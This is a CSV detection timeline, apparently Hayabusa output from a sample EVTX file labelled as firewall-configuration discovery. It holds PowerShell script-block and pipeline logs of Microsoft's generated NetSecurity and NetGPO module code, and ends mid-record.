[Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query 
(cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings 
= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetGPO ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' 
$script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 